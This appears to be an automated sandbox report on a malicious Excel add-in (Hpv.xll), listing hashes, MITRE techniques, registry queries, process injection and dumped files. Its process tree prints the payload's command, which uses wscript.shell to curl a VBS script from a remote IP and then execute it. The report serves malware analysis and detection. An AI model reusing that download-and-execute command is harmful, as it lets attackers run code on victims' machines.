392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23

General

Target

Hpv.xll
Size

50KB
MD5

d1a45948f411c02136ca98410475de52
SHA1

86ce40651326b8a67730da4e429d1bc202d46226
SHA256

392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA512

22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
SSDEEP

1536:oUK23Jsm6Nh5wF3s8KjrtN/5TqRGiNwmU2x0X2Y:ICsNh5wF3s8KXHRTviNnAmY

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

me.exe

pid	Process
196	me.exe

Loads dropped DLL 2 IoCs

Processes:

EXCEL.EXE

pid	Process
4628	EXCEL.EXE
4628	EXCEL.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
4628	EXCEL.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid	Process
4628	EXCEL.EXE
4628	EXCEL.EXE

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

EXCEL.EXE

pid	Process
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE
4628	EXCEL.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

EXCEL.EXEme.exe

description	pid	Process	procid_target
PID 4628 wrote to memory of 196	4628	EXCEL.EXE	71
PID 4628 wrote to memory of 196	4628	EXCEL.EXE	71
PID 196 wrote to memory of 4280	196	me.exe	72
PID 196 wrote to memory of 4280	196	me.exe	72

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Hpv.xll"
1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4628
- C:\Users\Public\me.exe
  C:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:196
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\users\public\1.vbs
    3⤵
    PID:4280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\me.exe

Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
C:\Users\Public\me.exe

Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
\Users\Admin\AppData\Local\Temp\Hpv.xll

Filesize
50KB

MD5
d1a45948f411c02136ca98410475de52

SHA1
86ce40651326b8a67730da4e429d1bc202d46226

SHA256
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23

SHA512
22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0

Download Submit
\Users\Admin\AppData\Local\Temp\Hpv.xll

Filesize
50KB

MD5
d1a45948f411c02136ca98410475de52

SHA1
86ce40651326b8a67730da4e429d1bc202d46226

SHA256
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23

SHA512
22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0

Download Submit
memory/4628-20-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-21-0x00007FFAEEFB0000-0x00007FFAEF05E000-memory.dmp

Filesize
696KB

Download
memory/4628-7-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-9-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-10-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-11-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-13-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-14-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-12-0x00007FFAACBD0000-0x00007FFAACBE0000-memory.dmp

Filesize
64KB

Download
memory/4628-15-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-16-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-17-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-0-0x00007FFAB0740000-0x00007FFAB0750000-memory.dmp

Filesize
64KB

Download
memory/4628-18-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-19-0x00007FFAACBD0000-0x00007FFAACBE0000-memory.dmp

Filesize
64KB

Download
memory/4628-5-0x00007FFAB0740000-0x00007FFAB0750000-memory.dmp

Filesize
64KB

Download
memory/4628-22-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-23-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-24-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-25-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-26-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-27-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-28-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-4-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-3-0x00007FFAB0740000-0x00007FFAB0750000-memory.dmp

Filesize
64KB

Download
memory/4628-1-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-2-0x00007FFAB0740000-0x00007FFAB0750000-memory.dmp

Filesize
64KB

Download
memory/4628-190-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download
memory/4628-191-0x00007FFAEEFB0000-0x00007FFAEF05E000-memory.dmp

Filesize
696KB

Download
memory/4628-194-0x00007FFAF06B0000-0x00007FFAF088B000-memory.dmp

Filesize
1.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads